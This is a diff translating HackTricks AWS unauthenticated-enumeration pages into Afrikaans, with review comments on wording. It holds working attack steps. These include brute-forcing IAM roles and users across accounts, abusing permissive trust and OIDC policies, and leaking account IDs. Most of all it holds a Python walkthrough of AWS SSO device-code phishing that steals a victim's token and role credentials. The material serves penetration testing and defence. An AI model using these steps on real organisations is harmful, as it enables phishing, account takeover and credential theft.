Alhoewel dit dalk nie 'n probleem vir webtoepassings is wat bedoel is om publiek toeganklik te wees nie, kan dit 'n probleem wees vir private toepassings of omgewings. -### Publicly Accessible S3 Buckets +### Publiek Toeganklike S3 Emmers -Elastic Beanstalk applications are often stored in S3 buckets before deployment. If the S3 bucket containing the application is publicly accessible, an attacker could **download the application code and search for vulnerabilities or sensitive information**. - -### Enumerate Public Environments +Elastic Beanstalk toepassings word dikwels in S3 emmers gestoor voor ontplooiing. As die S3 emmer wat die toepassing bevat publiek toeganklik is, kan 'n aanvaller **die toepassingskode aflaai en soek na kwesbaarhede of sensitiewe inligting**. +### Enumereer Publieke Omgewings ```bash aws elasticbeanstalk describe-environments --query 'Environments[?OptionSettings[?OptionName==`aws:elbv2:listener:80:defaultProcess` && contains(OptionValue, `redirect`)]].{EnvironmentName:EnvironmentName, ApplicationName:ApplicationName, Status:Status}' --output table ``` - {{#include ../../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-elasticsearch-unauthenticated-enum.md b/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-elasticsearch-unauthenticated-enum.md index 6ed2b74fe..d267b90bf 100644 --- a/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-elasticsearch-unauthenticated-enum.md +++ b/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-elasticsearch-unauthenticated-enum.md @@ -2,15 +2,9 @@ {{#include ../../../banners/hacktricks-training.md}} -### Public URL template - +### Publieke URL-sjabloon ``` https://vpc-{user_provided}-[random].[region].es.amazonaws.com https://search-{user_provided}-[random].[region].es.amazonaws.com ``` - {{#include ../../../banners/hacktricks-training.md}} - - - - 
diff --git a/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-iam-and-sts-unauthenticated-enum.md b/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-iam-and-sts-unauthenticated-enum.md index b6092fda4..cbf3fd01e 100644 --- a/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-iam-and-sts-unauthenticated-enum.md +++ b/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-iam-and-sts-unauthenticated-enum.md 
@@ -1,180 +1,162 @@ -# AWS - IAM & STS Unauthenticated Enum +# AWS - IAM & STS Ongeauthentiseerde Enum {{#include ../../../banners/hacktricks-training.md}} -## Enumerate Roles & Usernames in an account +## Enumereer Rolle & Gebruikersname in 'n rekening -### ~~Assume Role Brute-Force~~ +### ~~Neem Rol Brute-Force~~ > [!CAUTION] -> **This technique doesn't work** anymore as if the role exists or not you always get this error: +> **Hierdie tegniek werk nie** meer nie, aangesien jy altyd hierdie fout kry, ongeag of die rol bestaan of nie: > > `An error occurred (AccessDenied) when calling the AssumeRole operation: User: arn:aws:iam::947247140022:user/testenv is not authorized to perform: sts:AssumeRole on resource: arn:aws:iam::429217632764:role/account-balanceasdas` > -> You can **test this running**: +> Jy kan **dit toets deur**: > > `aws sts assume-role --role-arn arn:aws:iam::412345678909:role/superadmin --role-session-name s3-access-example` -Attempting to **assume a role without the necessary permissions** triggers an AWS error message. For instance, if unauthorized, AWS might return: - +Die poging om **'n rol aan te neem sonder die nodige toestemmings** aktiveer 'n AWS-foutboodskap. Byvoorbeeld, as jy nie gemagtig is nie, kan AWS teruggee: ```ruby An error occurred (AccessDenied) when calling the AssumeRole operation: User: arn:aws:iam::012345678901:user/MyUser is not authorized to perform: sts:AssumeRole on resource: arn:aws:iam::111111111111:role/aws-service-role/rds.amazonaws.com/AWSServiceRoleForRDS ``` - -This message confirms the role's existence but indicates that its assume role policy does not permit your assumption. In contrast, trying to **assume a non-existent role leads to a different error**: - +Hierdie boodskap bevestig die rol se bestaan, maar dui aan dat sy aanneemrolbeleid nie jou aanneming toelaat nie. 
In teenstelling hiermee, probeer om **'n nie-bestaande rol aan te neem lei tot 'n ander fout**: ```less An error occurred (AccessDenied) when calling the AssumeRole operation: Not authorized to perform sts:AssumeRole ``` +Interessant genoeg is hierdie metode van **onderskeiding tussen bestaande en nie-bestaande rolle** toepaslik selfs oor verskillende AWS-rekeninge. Met 'n geldige AWS-rekening ID en 'n geteikende woordlys, kan 'n mens die rolle in die rekening opnoem sonder om enige inherente beperkings te ondervind. -Interestingly, this method of **discerning between existing and non-existing roles** is applicable even across different AWS accounts. With a valid AWS account ID and a targeted wordlist, one can enumerate the roles present in the account without facing any inherent limitations. +Jy kan hierdie [script gebruik om potensiĂ«le principals op te noem](https://github.com/RhinoSecurityLabs/Security-Research/tree/master/tools/aws-pentest-tools/assume_role_enum) wat hierdie probleem misbruik. -You can use this [script to enumerate potential principals](https://github.com/RhinoSecurityLabs/Security-Research/tree/master/tools/aws-pentest-tools/assume_role_enum) abusing this issue. +### Trust Policies: Brute-Force Cross Account rolle en gebruikers -### Trust Policies: Brute-Force Cross Account roles and users - -Configuring or updating an **IAM role's trust policy involves defining which AWS resources or services are permitted to assume that role** and obtain temporary credentials. If the specified resource in the policy **exists**, the trust policy saves **successfully**. However, if the resource **does not exist**, an **error is generated**, indicating that an invalid principal was provided. +Om 'n **IAM rol se trust beleid te konfigureer of op te dateer, behels dit die definisie van watter AWS hulpbronne of dienste toegelaat word om daardie rol aan te neem** en tydelike kredensiale te verkry. 
As die gespesifiseerde hulpbron in die beleid **bestaande** is, stoor die trust beleid **suksesvol**. As die hulpbron egter **nie bestaan nie**, word 'n **fout gegenereer**, wat aandui dat 'n ongeldige principal verskaf is. > [!WARNING] -> Note that in that resource you could specify a cross account role or user: +> Let daarop dat jy in daardie hulpbron 'n cross account rol of gebruiker kan spesifiseer: > > - `arn:aws:iam::acc_id:role/role_name` > - `arn:aws:iam::acc_id:user/user_name` -This is a policy example: - +Dit is 'n beleidsvoorbeeld: ```json { - "Version": "2012-10-17", - "Statement": [ - { - "Effect": "Allow", - "Principal": { - "AWS": "arn:aws:iam::216825089941:role/Test" - }, - "Action": "sts:AssumeRole" - } - ] +"Version": "2012-10-17", +"Statement": [ +{ +"Effect": "Allow", +"Principal": { +"AWS": "arn:aws:iam::216825089941:role/Test" +}, +"Action": "sts:AssumeRole" +} +] } ``` - #### GUI -That is the **error** you will find if you uses a **role that doesn't exist**. If the role **exist**, the policy will be **saved** without any errors. (The error is for update, but it also works when creating) +Dit is die **fout** wat jy sal vind as jy 'n **rol wat nie bestaan nie** gebruik. As die rol **bestaan**, sal die beleid **gestoor** word sonder enige foute. 
(Die fout is vir opdatering, maar dit werk ook wanneer jy skep) ![](<../../../images/image (153).png>) #### CLI - ```bash ### You could also use: aws iam update-assume-role-policy # When it works aws iam create-role --role-name Test-Role --assume-role-policy-document file://a.json { - "Role": { - "Path": "/", - "RoleName": "Test-Role", - "RoleId": "AROA5ZDCUJS3DVEIYOB73", - "Arn": "arn:aws:iam::947247140022:role/Test-Role", - "CreateDate": "2022-05-03T20:50:04Z", - "AssumeRolePolicyDocument": { - "Version": "2012-10-17", - "Statement": [ - { - "Effect": "Allow", - "Principal": { - "AWS": "arn:aws:iam::316584767888:role/account-balance" - }, - "Action": [ - "sts:AssumeRole" - ] - } - ] - } - } +"Role": { +"Path": "/", +"RoleName": "Test-Role", +"RoleId": "AROA5ZDCUJS3DVEIYOB73", +"Arn": "arn:aws:iam::947247140022:role/Test-Role", +"CreateDate": "2022-05-03T20:50:04Z", +"AssumeRolePolicyDocument": { +"Version": "2012-10-17", +"Statement": [ +{ +"Effect": "Allow", +"Principal": { +"AWS": "arn:aws:iam::316584767888:role/account-balance" +}, +"Action": [ +"sts:AssumeRole" +] +} +] +} +} } # When it doesn't work aws iam create-role --role-name Test-Role2 --assume-role-policy-document file://a.json An error occurred (MalformedPolicyDocument) when calling the CreateRole operation: Invalid principal in policy: "AWS":"arn:aws:iam::316584767888:role/account-balanceefd23f2" ``` - You can automate this process with [https://github.com/carlospolop/aws_tools](https://github.com/carlospolop/aws_tools) - `bash unauth_iam.sh -t user -i 316584767888 -r TestRole -w ./unauth_wordlist.txt` -Our using [Pacu](https://github.com/RhinoSecurityLabs/pacu): +Ons gebruik [Pacu](https://github.com/RhinoSecurityLabs/pacu): - `run iam__enum_users --role-name admin --account-id 229736458923 --word-list /tmp/names.txt` - `run iam__enum_roles --role-name admin --account-id 229736458923 --word-list /tmp/names.txt` -- The `admin` role used in the example is a **role in your account to by impersonated** 
by pacu to create the policies it needs to create for the enumeration +- Die `admin` rol wat in die voorbeeld gebruik word, is 'n **rol in jou rekening wat deur pacu geĂŻmpersonifieer moet word** om die beleide te skep wat dit nodig het om vir die enumerasie te skep ### Privesc -In the case the role was bad configured an allows anyone to assume it: - +In die geval dat die rol sleg gekonfigureer was en enige iemand toelaat om dit aan te neem: ```json { - "Version": "2012-10-17", - "Statement": [ - { - "Effect": "Allow", - "Principal": { - "AWS": "*" - }, - "Action": "sts:AssumeRole" - } - ] +"Version": "2012-10-17", +"Statement": [ +{ +"Effect": "Allow", +"Principal": { +"AWS": "*" +}, +"Action": "sts:AssumeRole" +} +] } ``` +Die aanvaller kan dit net aanvaar. -The attacker could just assume it. - -## Third Party OIDC Federation - -Imagine that you manage to read a **Github Actions workflow** that is accessing a **role** inside **AWS**.\ -This trust might give access to a role with the following **trust policy**: +## Derdeparty OIDC Federasie +Stel jou voor dat jy daarin slaag om 'n **Github Actions workflow** te lees wat toegang het tot 'n **rol** binne **AWS**.\ +Hierdie vertroue mag toegang gee tot 'n rol met die volgende **vertrouensbeleid**: ```json { - "Version": "2012-10-17", - "Statement": [ - { - "Effect": "Allow", - "Principal": { - "Federated": "arn:aws:iam:::oidc-provider/token.actions.githubusercontent.com" - }, - "Action": "sts:AssumeRoleWithWebIdentity", - "Condition": { - "StringEquals": { - "token.actions.githubusercontent.com:aud": "sts.amazonaws.com" - } - } - } - ] +"Version": "2012-10-17", +"Statement": [ +{ +"Effect": "Allow", +"Principal": { +"Federated": "arn:aws:iam:::oidc-provider/token.actions.githubusercontent.com" +}, +"Action": "sts:AssumeRoleWithWebIdentity", +"Condition": { +"StringEquals": { +"token.actions.githubusercontent.com:aud": "sts.amazonaws.com" +} +} +} +] } ``` +Hierdie vertrouensbeleid mag korrek wees, maar die **gebrek 
aan meer voorwaardes** behoort jou te laat wantrou.\ +Dit is omdat die vorige rol deur **ENIGEEN van Github Actions** aanvaar kan word! Jy moet ook ander dinge soos org naam, repo naam, omgewing, tak in die voorwaardes spesifiseer... -This trust policy might be correct, but the **lack of more conditions** should make you distrust it.\ -This is because the previous role can be assumed by **ANYONE from Github Actions**! You should specify in the conditions also other things such as org name, repo name, env, brach... - -Another potential misconfiguration is to **add a condition** like the following: - +'n Ander potensiĂ«le miskonfigurasie is om **'n voorwaarde** soos die volgende by te voeg: ```json "StringLike": { - "token.actions.githubusercontent.com:sub": "repo:org_name*:*" +"token.actions.githubusercontent.com:sub": "repo:org_name*:*" } ``` +Let op dat **wildcard** (\*) voor die **kolon** (:). Jy kan 'n org soos **org_name1** skep en **die rol aanvaar** vanaf 'n Github Action. -Note that **wildcard** (\*) before the **colon** (:). You can create an org such as **org_name1** and **assume the role** from a Github Action. - -## References +## Verwysings - [https://www.youtube.com/watch?v=8ZXRw4Ry3mQ](https://www.youtube.com/watch?v=8ZXRw4Ry3mQ) - [https://rhinosecuritylabs.com/aws/assume-worst-aws-assume-role-enumeration/](https://rhinosecuritylabs.com/aws/assume-worst-aws-assume-role-enumeration/) {{#include ../../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-identity-center-and-sso-unauthenticated-enum.md b/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-identity-center-and-sso-unauthenticated-enum.md index fd4d31de6..6f9b9e7cb 100644 --- a/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-identity-center-and-sso-unauthenticated-enum.md 
+++ b/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-identity-center-and-sso-unauthenticated-enum.md 
@@ -1,36 +1,33 @@ -# AWS - Identity Center & SSO Unauthenticated Enum +# AWS - Identiteitsentrum & SSO Ongeauthentiseerde Enum {{#include ../../../banners/hacktricks-training.md}} -## AWS Device Code Phishing +## AWS Toestelkode Phishing -Initially proposed in [**this blog post**](https://blog.christophetd.fr/phishing-for-aws-credentials-via-aws-sso-device-code-authentication/), it's possible to send a **link** to a user using AWS SSO that if the **user accepts** the attacker will be able to get a **token to impersonate the user** and access all the roles the user is able to access in the **Identity Center**. +Aanvanklik voorgestel in [**hierdie blogpos**](https://blog.christophetd.fr/phishing-for-aws-credentials-via-aws-sso-device-code-authentication/), dit is moontlik om 'n **skakel** na 'n gebruiker te stuur wat AWS SSO gebruik, wat, indien die **gebruiker aanvaar**, die aanvaller in staat sal stel om 'n **token te verkry om die gebruiker na te boots** en toegang te verkry tot al die rolle wat die gebruiker kan benader in die **Identiteitsentrum**. -In order to perform this attack the requisites are: +Om hierdie aanval uit te voer, is die vereistes: -- The victim needs to use **Identity Center** -- The attacker must know the **subdomain** used by the victim `.awsapps.com/start` +- Die slagoffer moet **Identiteitsentrum** gebruik +- Die aanvaller moet die **subdomein** ken wat deur die slagoffer gebruik word `.awsapps.com/start` -Just with the previous info, the **attacker will be able to send a link to the user** that if **accepted** will grant the **attacker access over the AWS user** account. +Net met die vorige inligting, sal die **aanvaller in staat wees om 'n skakel na die gebruiker te stuur** wat, indien **aangeneem**, die **aanvaller toegang tot die AWS gebruiker** rekening sal gee. -### Attack +### Aanval -1. **Finding the subdomain** +1. 
**Vind die subdomein** -The first step of the attacker is to find out the subdomain the victim company is using in their Identity Center. This can be done via **OSINT** or **guessing + BF** as most companies will be using their name or a variation of their name here. - -With this info, it's possible to get the region where the Indentity Center was configured with: +Die eerste stap van die aanvaller is om uit te vind watter subdomein die slagoffer maatskappy in hul Identiteitsentrum gebruik. Dit kan gedoen word deur **OSINT** of **raai + BF** aangesien die meeste maatskappye hul naam of 'n variasie van hul naam hier sal gebruik. +Met hierdie inligting is dit moontlik om die streek te kry waar die Identiteitsentrum geconfigureer is: ```bash curl https://victim.awsapps.com/start/ -s | grep -Eo '"region":"[a-z0-9\-]+"' "region":"us-east-1 ``` +2. **Genereer die skakel vir die slagoffer & Stuur dit** -2. **Generate the link for the victim & Send it** - -Run the following code to generate an AWS SSO login link so the victim can authenticate.\ -For the demo, run this code in a python console and do not exit it as later you will need some objects to get the token: - +Voer die volgende kode uit om 'n AWS SSO aanmeldskakel te genereer sodat die slagoffer kan autentiseer.\ +Vir die demo, voer hierdie kode in 'n python-konsol uit en verlaat dit nie, aangesien jy later 'n paar voorwerpe nodig sal hĂȘ om die token te verkry: ```python import boto3 
@@ -39,89 +36,84 @@ AWS_SSO_START_URL = 'https://victim.awsapps.com/start' # CHANGE THIS sso_oidc = boto3.client('sso-oidc', region_name=REGION) client = sso_oidc.register_client( - clientName = 'attacker', - clientType = 'public' +clientName = 'attacker', +clientType = 'public' ) client_id = client.get('clientId') client_secret = client.get('clientSecret') authz = sso_oidc.start_device_authorization( - clientId=client_id, - clientSecret=client_secret, - startUrl=AWS_SSO_START_URL +clientId=client_id, +clientSecret=client_secret, +startUrl=AWS_SSO_START_URL ) url = authz.get('verificationUriComplete') deviceCode = authz.get('deviceCode') print("Give this URL to the victim: " + url) ``` +Stuur die gegenereerde skakel na die slagoffer met jou wonderlike sosiale ingenieursvaardighede! -Send the generated link to the victim using you awesome social engineering skills! +3. **Wag totdat die slagoffer dit aanvaar** -3. **Wait until the victim accepts it** - -If the victim was **already logged in AWS** he will just need to accept granting the permissions, if he wasn't, he will need to **login and then accept granting the permissions**.\ -This is how the promp looks nowadays: +As die slagoffer **reeds in AWS ingelog** was, sal hy net die toestemmings moet aanvaar, as hy nie was nie, sal hy moet **inlog en dan die toestemmings aanvaar**.\ +So lyk die prompt vandag:
-4. **Get SSO access token** - -If the victim accepted the prompt, run this code to **generate a SSO token impersonating the user**: +4. **Kry SSO toegangstoken** +As die slagoffer die prompt aanvaar het, voer hierdie kode uit om **'n SSO-token te genereer wat die gebruiker naboots**: ```python token_response = sso_oidc.create_token( - clientId=client_id, - clientSecret=client_secret, - grantType="urn:ietf:params:oauth:grant-type:device_code", - deviceCode=deviceCode +clientId=client_id, +clientSecret=client_secret, +grantType="urn:ietf:params:oauth:grant-type:device_code", +deviceCode=deviceCode ) sso_token = token_response.get('accessToken') ``` +Die SSO toegangstoken is **geldigheid vir 8h**. -The SSO access token is **valid for 8h**. - -5. **Impersonate the user** - +5. **Verpersoonlik die gebruiker** ```python sso_client = boto3.client('sso', region_name=REGION) # List accounts where the user has access aws_accounts_response = sso_client.list_accounts( - accessToken=sso_token, - maxResults=100 +accessToken=sso_token, +maxResults=100 ) aws_accounts_response.get('accountList', []) # Get roles inside an account roles_response = sso_client.list_account_roles( - accessToken=sso_token, - accountId= +accessToken=sso_token, +accountId= ) roles_response.get('roleList', []) # Get credentials over a role sts_creds = sso_client.get_role_credentials( - accessToken=sso_token, - roleName=, - accountId= +accessToken=sso_token, +roleName=, +accountId= ) sts_creds.get('roleCredentials') ``` +### Phishing die onphishbare MFA -### Phishing the unphisable MFA +Dit is lekker om te weet dat die vorige aanval **werk selfs as 'n "onphishbare MFA" (webAuth) gebruik word**. Dit is omdat die vorige **werkstroom nooit die gebruikte OAuth-domein verlaat nie**. 
Nie soos in ander phishing-aanvalle waar die gebruiker die aanmeld-domein moet vervang nie, in die geval is die toestelkode werkstroom voorberei sodat 'n **kode bekend is aan 'n toestel** en die gebruiker kan aanmeld selfs op 'n ander masjien. As die prompt aanvaar word, kan die toestel, net deur **die aanvanklike kode te ken**, **akkrediteer** vir die gebruiker. -It's fun to know that the previous attack **works even if an "unphisable MFA" (webAuth) is being used**. This is because the previous **workflow never leaves the used OAuth domain**. Not like in other phishing attacks where the user needs to supplant the login domain, in the case the device code workflow is prepared so a **code is known by a device** and the user can login even in a different machine. If accepted the prompt, the device, just by **knowing the initial code**, is going to be able to **retrieve credentials** for the user. +Vir meer inligting oor hierdie [**kyk hierdie pos**](https://mjg59.dreamwidth.org/62175.html). -For more info about this [**check this post**](https://mjg59.dreamwidth.org/62175.html). - -### Automatic Tools +### Outomatiese Gereedskap - [https://github.com/christophetd/aws-sso-device-code-authentication](https://github.com/christophetd/aws-sso-device-code-authentication) - [https://github.com/sebastian-mora/awsssome_phish](https://github.com/sebastian-mora/awsssome_phish) -## References +## Verwysings - [https://blog.christophetd.fr/phishing-for-aws-credentials-via-aws-sso-device-code-authentication/](https://blog.christophetd.fr/phishing-for-aws-credentials-via-aws-sso-device-code-authentication/) - [https://ruse.tech/blogs/aws-sso-phishing](https://ruse.tech/blogs/aws-sso-phishing) @@ -129,7 +121,3 @@ For more info about this [**check this post**](https://mjg59.dreamwidth.org/6217 - [https://ramimac.me/aws-device-auth](https://ramimac.me/aws-device-auth) {{#include ../../../banners/hacktricks-training.md}} - - - - 
diff --git a/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-iot-unauthenticated-enum.md b/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-iot-unauthenticated-enum.md index 38622c338..778c09277 100644 --- a/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-iot-unauthenticated-enum.md +++ b/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-iot-unauthenticated-enum.md @@ -2,16 +2,10 @@ {{#include ../../../banners/hacktricks-training.md}} -### Public URL template - +### Publieke URL-sjabloon ``` mqtt://{random_id}.iot.{region}.amazonaws.com:8883 https://{random_id}.iot.{region}.amazonaws.com:8443 https://{random_id}.iot.{region}.amazonaws.com:443 ``` - {{#include ../../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-kinesis-video-unauthenticated-enum.md b/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-kinesis-video-unauthenticated-enum.md index 58b8a1309..c334f718b 100644 --- a/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-kinesis-video-unauthenticated-enum.md +++ b/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-kinesis-video-unauthenticated-enum.md @@ -2,14 +2,8 @@ {{#include ../../../banners/hacktricks-training.md}} -### Public URL template - +### Publieke URL-sjabloon ``` https://{random_id}.kinesisvideo.{region}.amazonaws.com ``` - {{#include ../../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-lambda-unauthenticated-access.md b/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-lambda-unauthenticated-access.md index 5109a2044..e3b566b17 100644 --- a/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-lambda-unauthenticated-access.md 
+++ b/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-lambda-unauthenticated-access.md 
@@ -2,25 +2,19 @@ {{#include ../../../banners/hacktricks-training.md}} -## Public Function URL +## Publieke Funksie URL -It's possible to relate a **Lambda** with a **public function URL** that anyone can access. It could contain web vulnerabilities. - -### Public URL template +Dit is moontlik om 'n **Lambda** te verbind met 'n **publieke funksie URL** wat enige iemand kan toegang. Dit kan web kwesbaarhede bevat. +### Publieke URL sjabloon ``` https://{random_id}.lambda-url.{region}.on.aws/ ``` +### Kry rekening ID van openbare Lambda URL -### Get Account ID from public Lambda URL +Net soos met S3-buckets, Data Exchange en API-gateways, is dit moontlik om die rekening ID van 'n rekening te vind wat die **`aws:ResourceAccount`** **Beleidstoestand Sleutel** van 'n openbare lambda URL misbruik. Dit word gedoen deur die rekening ID een karakter op 'n slag te vind deur gebruik te maak van wildcard in die **`aws:ResourceAccount`** afdeling van die beleid.\ +Hierdie tegniek laat ook toe om **waardes van etikette** te kry as jy die etiket sleutel ken (daar is 'n paar standaard interessante). -Just like with S3 buckets, Data Exchange and API gateways, It's possible to find the account ID of an account abusing the **`aws:ResourceAccount`** **Policy Condition Key** from a public lambda URL. This is done by finding the account ID one character at a time abusing wildcards in the **`aws:ResourceAccount`** section of the policy.\ -This technique also allows to get **values of tags** if you know the tag key (there some default interesting ones). - -You can find more information in the [**original research**](https://blog.plerion.com/conditional-love-for-aws-metadata-enumeration/) and the tool [**conditional-love**](https://github.com/plerionhq/conditional-love/) to automate this exploitation. 
+Jy kan meer inligting vind in die [**oorspronklike navorsing**](https://blog.plerion.com/conditional-love-for-aws-metadata-enumeration/) en die hulpmiddel [**conditional-love**](https://github.com/plerionhq/conditional-love/) om hierdie uitbuiting te outomatiseer. {{#include ../../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-media-unauthenticated-enum.md b/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-media-unauthenticated-enum.md index 2bbc4fdd6..f641e88cd 100644 --- a/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-media-unauthenticated-enum.md +++ b/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-media-unauthenticated-enum.md @@ -2,16 +2,10 @@ {{#include ../../../banners/hacktricks-training.md}} -### Public URL template - +### Publieke URL-sjabloon ``` https://{random_id}.mediaconvert.{region}.amazonaws.com https://{random_id}.mediapackage.{region}.amazonaws.com/in/v1/{random_id}/channel https://{random_id}.data.mediastore.{region}.amazonaws.com ``` - {{#include ../../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-mq-unauthenticated-enum.md b/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-mq-unauthenticated-enum.md index ab06211e2..24c2e92de 100644 --- a/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-mq-unauthenticated-enum.md +++ b/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-mq-unauthenticated-enum.md 
@@ -2,25 +2,19 @@ {{#include ../../../banners/hacktricks-training.md}} -## Public Port +## Publieke Poort ### **RabbitMQ** -In case of **RabbitMQ**, by **default public access** and ssl are enabled. But you need **credentials** to access (`amqps://.mq.us-east-1.amazonaws.com:5671`​​). Moreover, it's possible to **access the web management console** if you know the credentials in `https://b-.mq.us-east-1.amazonaws.com/` +In die geval van **RabbitMQ** is **publieke toegang** en ssl standaard geaktiveer. Maar jy het **akkrediteer** nodig om toegang te verkry (`amqps://.mq.us-east-1.amazonaws.com:5671`​​). Boonop is dit moontlik om die **webbestuurskonsol** te benader as jy die akkrediteer weet in `https://b-.mq.us-east-1.amazonaws.com/` ### ActiveMQ -In case of **ActiveMQ**, by default public access and ssl are enabled, but you need credentials to access. - -### Public URL template +In die geval van **ActiveMQ** is publieke toegang en ssl standaard geaktiveer, maar jy het akkrediteer nodig om toegang te verkry. +### Publieke URL-sjabloon ``` https://b-{random_id}-{1,2}.mq.{region}.amazonaws.com:8162/ ssl://b-{random_id}-{1,2}.mq.{region}.amazonaws.com:61617 ``` - {{#include ../../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-msk-unauthenticated-enum.md b/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-msk-unauthenticated-enum.md index 9bbbd408d..f06943858 100644 --- a/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-msk-unauthenticated-enum.md +++ b/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-msk-unauthenticated-enum.md 
@@ -2,21 +2,15 @@ {{#include ../../../banners/hacktricks-training.md}} -### Public Port +### Publieke Poort -It's possible to **expose the Kafka broker to the public**, but you will need **credentials**, IAM permissions or a valid certificate (depending on the auth method configured). +Dit is moontlik om die **Kafka broker aan die publiek bloot te stel**, maar jy sal **akkrediteer** nodig hĂȘ, IAM-toestemmings of 'n geldige sertifikaat (afhangende van die geconfigureerde outentikasie metode). -It's also **possible to disabled authentication**, but in that case **it's not possible to directly expose** the port to the Internet. - -### Public URL template +Dit is ook **moontlik om outentikasie te deaktiveer**, maar in daardie geval is dit **nie moontlik om die poort direk aan die Internet bloot te stel** nie. +### Publieke URL-sjabloon ``` b-{1,2,3,4}.{user_provided}.{random_id}.c{1,2}.kafka.{region}.amazonaws.com {user_provided}.{random_id}.c{1,2}.kafka.useast-1.amazonaws.com ``` - {{#include ../../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-rds-unauthenticated-enum.md b/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-rds-unauthenticated-enum.md index 218300e3f..2f99337df 100644 --- a/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-rds-unauthenticated-enum.md +++ b/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-rds-unauthenticated-enum.md 
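Review bot: spelling in the first paragraph of this hunk drifts into Dutch: "geconfigureerde" should be "gekonfigureerde" (the SQS hunk later in this patch already uses "konfigureer"), "outentikasie metode" is one compound, "outentikasiemetode", and "akkrediteer" again stands in for the noun "credentials". Apply the same noun chosen for the MQ page here.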
@@ -1,23 +1,22 @@ -# AWS - RDS Unauthenticated Enum +# AWS - RDS Ongeauthentiseerde Enum {{#include ../../../banners/hacktricks-training.md}} ## RDS -For more information check: +Vir meer inligting, kyk: {{#ref}} ../aws-services/aws-relational-database-rds-enum.md {{#endref}} -## Public Port +## Publieke Poort -It's possible to give public access to the **database from the internet**. The attacker will still need to **know the username and password,** IAM access, or an **exploit** to enter in the database. +Dit is moontlik om publieke toegang tot die **databasis vanaf die internet** te gee. Die aanvaller sal steeds moet **weet wat die gebruikersnaam en wagwoord is,** IAM-toegang, of 'n **exploit** om in die databasis in te kom. -## Public RDS Snapshots - -AWS allows giving **access to anyone to download RDS snapshots**. You can list these public RDS snapshots very easily from your own account: +## Publieke RDS-snapshots +AWS laat toe om **toegang aan enigiemand te gee om RDS-snapshots af te laai**. Jy kan hierdie publieke RDS-snapshots baie maklik vanaf jou eie rekening lys: ```bash # Public RDS snapshots aws rds describe-db-snapshots --include-public @@ -33,16 +32,9 @@ aws rds describe-db-snapshots --snapshot-type public [--region us-west-2] ## Even if in the console appear as there are public snapshot it might be public ## snapshots from other accounts used by the current account ``` - -### Public URL template - +### Publieke URL-sjabloon ``` mysql://{user_provided}.{random_id}.{region}.rds.amazonaws.com:3306 postgres://{user_provided}.{random_id}.{region}.rds.amazonaws.com:5432 ``` - {{#include ../../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-redshift-unauthenticated-enum.md b/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-redshift-unauthenticated-enum.md index ab1577a1e..dad1f81d7 100644 
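Review bot: the translated "Publieke Poort" sentence in the first hunk does not parse: "Die aanvaller sal steeds moet **weet wat die gebruikersnaam en wagwoord is,** IAM-toegang, of 'n **exploit** om in die databasis in te kom" makes "weet" govern only the first item. Something like "Die aanvaller het steeds die gebruikersnaam en wagwoord, IAM-toegang of 'n exploit nodig om in die databasis in te kom" keeps the three alternatives parallel. The title "Ongeauthentiseerde Enum" mixes a Dutch spelling with the "outentikasie" used on the MSK page; "Ongeoutentiseerde" matches. Also note that the bash comments in this file ("## Even if in the console appear ...") stay English while the S3 wordlist block's comments are translated; pick one rule for code comments across the patch.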
